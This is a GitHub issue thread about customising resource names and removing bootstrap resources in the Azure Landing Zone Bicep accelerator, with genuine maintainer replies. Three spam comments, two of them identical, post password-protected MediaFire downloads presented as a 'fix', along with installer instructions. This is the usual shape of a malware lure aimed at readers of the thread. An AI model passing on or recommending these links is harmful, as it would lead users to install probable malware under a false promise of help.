### ISSUE TITLE
Feature Request: Own resource naming convention / custom-parameters definition for deployment

### ISSUE THREAD

**Issue by michael-novak-80** [Azure/ALZ-PowerShell-Module#145]
Hi,

I cannot find a way to easily customize the names of resources deployed by the Accelerator. I'm using GitHub Bicep, CI/CD. For example MG names, RG names, Log Analytics names, or VPN gateway names. 

I have used the legacy ALZ Bicep accelerator in the past, where the "custom-parameters" files and other .bicep files  could be easily customized (for example MG names and IDs) and were applied. Even though I can find "hubNetworking.parameters.all.json" and other files in bootstrap directory it seems that the default versions are uploaded to repositories and then deployed from there. If I update these files in the repositories, the custom names are deployed, but it seems that change breaks another deployment steps (i.e. cannot find resource with the "default" name, etc.). 

Is it even possible to use custom resource names with this Accelerator or do I have to accept the fact that I have to work with default names in my ALZ?

_Also_, I cannot find a correct way how to remove bootstrap resources (so that the client does not have to pay for these resources unnecessarily) without using the "Destroy" parameter which wipes out everything. 

Thank you

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by oZakari** [comment]
Hi @michael-novak-80,

The parameter files referenced in your repository, which was created from the Accelerator, will update your deployment accordingly. This behavior is consistent with the classic accelerator. If you update the name of a resource in one module, and another module depends upon that resource then you will need to update those references.

However, we need to address an issue with the custom-modules directory. If a module in the custom-modules directory matches one from the upstream (ALZ-Bicep), the CD pipeline should prioritize the custom module. Unfortunately, this isn't happening as it should.

As for the bootstrap resources, are you referring to the managed identities? If so, those are required for deploying the resources to your Azure Environment and they are free. If you are seeing container instances and a container registry, it means that you have selected to use self-hosted runners. These should all reside in the same resource group which you can delete manually. To avoid provisioning them from the start, change `use_self_hosted_agents` to `false` in your Bicep Inputs config file that you referenced when first deploying the Accelerator.

**Comment by jaredfholgate** [comment]
@oZakari Do we need to raise a separate issue for this? And close this one?

`we need to address an issue with the custom-modules directory. If a module in the custom-modules directory matches one from the upstream (ALZ-Bicep), the CD pipeline should prioritize the custom module. Unfortunately, this isn't happening as it should.`

**Comment by oZakari** [comment]
Hey @michael-novak-80, as we haven't heard back we will go ahead and close this issue, and open a dedicated issue up for the custom-modules directory. Feel free to reach back out if any other questions come up!
